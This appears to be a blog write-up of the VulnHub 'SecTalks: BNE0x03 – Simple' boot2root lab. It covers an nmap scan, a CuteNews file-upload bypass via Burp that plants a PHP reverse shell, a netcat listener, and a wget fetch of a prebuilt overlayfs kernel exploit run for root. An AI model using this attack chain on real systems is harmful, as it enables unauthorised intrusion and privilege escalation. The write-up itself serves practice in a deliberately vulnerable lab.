[VULNHUB] SecTalks: BNE0x03 – Simple

This VM it’s a really easy boot2root challenge. I pwned it in 5 minutes, let’s start!

PART ONE

I scanned all available services with nmap:

nmap 192.168.1.20 -sV

The output is:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-15 19:09 CEST
Nmap scan report for 192.168.1.20
Host is up (0.0021s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds

So there is only a website here. I opened it and I have a login form in front of me. The server is running CuteNews v.2.0.3 and after some research I found an arbitrary file upload vulnerability here. So I just registered a new user (testuser in this case) and I logged in. Then I clicked on “Personal Options”. Now I started Burp Suite and I activated the proxy interception. Then I downloaded this shell and I edited the first 2 lines with my local IP and listening port. Then i renamed it with a .jpg extension and I clicked “Browse…”, I selected the file and I pressed “Save Changes”. Now I edited the POST request into Burp Suite changing the extension to .php, I forwarded the request and the file was uploaded! Now I started listen locally:

nc -lvp 1234

Now I browsed to http://192.168.1.20/uploads/avatar_testuser_php-reverse-shell.php and I got the reverse shell without TTY. To achieve this I just used python:

python -c 'import pty; pty.spawn("/bin/bash")'

PART TWO

Now I need to escalate privileges. I started checking the kernel version:

uname -a

The output is:

Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

I checked online the kernel version and I discoverd that it was vulnerable to overlayfs exploit. So I browsed to /tmp and I typed:

wget "https://www.kernel-exploits.com/media/ofs_32"

Then I gave it execution permissions:

chmod +x ofs_32

And now I just executed it:

./ofs_32

I got a shell as root! I res-spawned a TTY shell with python and I browsed to /root and I listed files and I found flag.txt. I just opened it:

U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!

The VM is rooted and completed!

Advertisements
[VULNHUB] SecTalks: BNE0x03 – Simple

One thought on “[VULNHUB] SecTalks: BNE0x03 – Simple

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s